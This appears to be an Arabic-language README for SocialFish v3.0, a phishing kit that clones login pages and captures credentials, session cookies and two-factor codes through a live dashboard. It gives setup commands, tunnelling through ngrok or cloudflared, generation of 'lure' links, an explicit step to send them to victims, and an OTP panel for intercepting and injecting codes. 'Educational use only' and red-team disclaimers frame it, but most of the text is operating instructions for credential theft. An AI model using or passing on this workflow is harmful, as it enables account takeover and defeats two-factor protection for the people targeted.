
أداة تصيد ديناميكية حديثة لتمارين الفريق الأحمر المصرح بها. تستنسخ صفحات تسجيل الدخول، وتلتقط بيانات الاعتماد وملفات تعريف الارتباط ورمزات التحقق الثنائي (2FA) مع لوحة تحكم حية ودعم التوجيه.
SocialFish v3.0 يقدم ميزات قوية جديدة لاستنساخ صفحات تسجيل الدخول الحديثة، التقاط الكوكيز، واعتراض رموز المصادقة الثنائية (2FA) مع لوحة تحكم حية.
python setup.py
سيقوم هذا بـ:
pip install -r requirements.txt
playwright install chromium
python SocialFish.py admin password
ثم الوصول إلى: http://localhost:5000/neptune
إنشاء قالب
/templates → قالب جديد → أدخل رابط الهدف
إعداد النفق (اختياري، للاختبار عن بعد)
انقر على "Tunnel" → اختر ngrok/cloudflared → تفويض
توليد رابط الإغراء
انقر على "Lure" → انسخ الرابط غير القابل للتخمين
إرسال إلى الضحايا
وزع رابط الإغراء في رسائل البريد الإلكتروني، الرسائل، إلخ.
المراقبة في الوقت الفعلي
/sessions → عرض بيانات الاعتماد الملتقطة، الكوكيز، رموز OTP
/admin/otp_panel.html → اعتراض وحقن رموز المصادقة الثنائية
both (بيانات الاعتماد + الكوكيز)، login (بيانات الاعتماد فقط)، cookies (الجلسة فقط)يعمل مع أي صفحة تسجيل دخول تستخدم:
# قائمة القوالب
curl http://localhost:5000/templates
# توليد رابط الإغراء
curl -X POST http://localhost:5000/lure/generate \
-d "template_id=1"
# عرض الجلسة
curl http://localhost:5000/session/1
# الإعداد
python setup.py # إعداد تفاعلي
# الأنفاق
python core/tunnel_manager.py setup
python core/tunnel_manager.py start --type ngrok
# قاعدة البيانات
python core/db_migration.py
SocialFish/
├── SocialFish.py # تطبيق Flask الرئيسي
├── setup.py # معالج الإعداد التفاعلي
├── FEATURES_v3.md # وثائق الميزات
├── IMPLEMENTATION_SUMMARY.md # تفاصيل التنفيذ
├── core/
│ ├── recorder_playwright.py # أتمتة المتصفح
│ ├── cookie_inspector.py # تحليل الكوكيز
│ ├── tunnel_manager.py # دعم الأنفاق
│ ├── db_migration.py # مخطط قاعدة البيانات
│ └── ... (وحدات أخرى)
└── templates/
└── admin/
├── templates.html # واجهة مكتبة القوالب
├── otp_panel.html # واجهة اعتراض OTP
├── sessions.html # واجهة إدارة الجلسات
└── ... (قوالب أخرى)
⚠️ للاستخدام التعليمي فقط
انظر CODE_OF_CONDUCT.md و LICENSE للتفاصيل.
هل تبحث عن وحدة التحكم المحمولة؟ تحقق من SocialFishMobile
للاستخدام للأغراض التعليمية فقط
استخدام SocialFish هو المسؤولية الكاملة للمستخدم النهائي. المطورون لا يتحملون أي مسؤولية وليسوا مسؤولين عن أي سوء استخدام أو ضرر يسببه هذا البرنامج.
"يتم إخلاء المسؤولية. لا يتحمل مالك حقوق الطبع والنشر أو المساهمون أي مسؤولية عن أي أضرار مباشرة أو غير مباشرة أو عرضية أو خاصة أو تبعية (بما في ذلك، على سبيل المثال لا الحصر، شراء السلع أو الخدمات البديلة؛ فقدان الاستخدام أو البيانات أو الأرباح؛ أو انقطاع الأعمال) مهما كانت أسبابها وبغض النظر عن نظرية المسؤولية، سواء كانت في العقد أو المسؤولية التقصيرية (بما في ذلك الإهمال أو غير ذلك) الناشئة بأي شكل من الأشكال عن استخدام هذا البرنامج، حتى لو تم إبلاغهم بإمكانية حدوث مثل هذه الأضرار."
مأخوذ من LICENSE.
التشغيل باستخدام Docker:
docker compose up
الحالة: جاهز للإنتاج لاختبارات الأمان المصرح بها وتمارين الفريق الأحمر
نشجعك على المساهمة في SocialFish! يرجى الاطلاع على دليل المساهمة في SocialFish للحصول على إرشادات حول كيفية المتابعة. انضم إلينا!
@carinamary2448 - https://github.com/carinamary2448